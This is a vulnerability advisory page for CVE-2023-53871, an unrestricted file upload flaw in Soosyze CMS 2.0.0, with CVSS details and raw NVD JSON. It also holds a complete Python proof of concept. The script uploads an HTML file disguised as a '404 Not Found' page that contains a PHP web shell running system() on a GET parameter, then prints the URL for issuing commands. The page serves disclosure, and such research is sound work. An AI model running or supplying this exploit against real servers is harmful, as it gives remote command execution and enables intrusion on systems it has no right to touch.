Security Vulnerability Report
中文
CVE-2023-53871 CVSS 9.8 CRITICAL

CVE-2023-53871

Published: 2025-12-15 21:15:50
Last Modified: 2025-12-30 18:46:35
Source: [email protected]

Description

Soosyze 2.0.0 contains a file upload vulnerability that allows attackers to upload arbitrary HTML files with embedded PHP code to the application. Attackers can exploit the broken file upload mechanism to potentially view sensitive file paths and execute malicious PHP scripts on the server.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:soosyze:soosyze:2.0.0:*:*:*:*:*:*:* - VULNERABLE
Soosyze CMS 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2023-53871 PoC - Soosyze 2.0.0 Arbitrary File Upload # Author: VulnCheck # Reference: https://www.vulncheck.com/advisories/soosyze-unrestricted-file-upload-via-broken-upload-logic def exploit(target_url, file_path='/uploads/'): """ Exploit function for Soosyze 2.0.0 arbitrary file upload vulnerability """ # Malicious PHP code embedded in HTML file php_payload = '''<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } else { echo "Shell uploaded successfully. Use ?cmd=<command>"; } ?> ''' html_content = f'''<!DOCTYPE html> <html> <head><title>404 Not Found</title></head> <body> {php_payload} </body> </html> ''' # Prepare the malicious file files = { 'file': ('exploit.html', html_content, 'text/html') } try: # Upload the malicious file response = requests.post(target_url, files=files, timeout=10) if response.status_code == 200: print(f"[+] File uploaded successfully!") print(f"[+] Access the shell at: {target_url}/{file_path}exploit.html?cmd=whoami") else: print(f"[-] Upload failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com/index.php") sys.exit(1) target = sys.argv[1] exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53871", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:49.543", "lastModified": "2025-12-30T18:46:34.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soosyze 2.0.0 contains a file upload vulnerability that allows attackers to upload arbitrary HTML files with embedded PHP code to the application. Attackers can exploit the broken file upload mechanism to potentially view sensitive file paths and execute malicious PHP scripts on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:soosyze:soosyze:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA9B2D87-6534-4515-8A7C-91CD421C8D32"}]}]}], "references": [{"url": "https://github.com/soosyze/soosyze", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://soosyze.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51718", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/soosyze-unrestricted-file-upload-via-broken-upload-logic", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.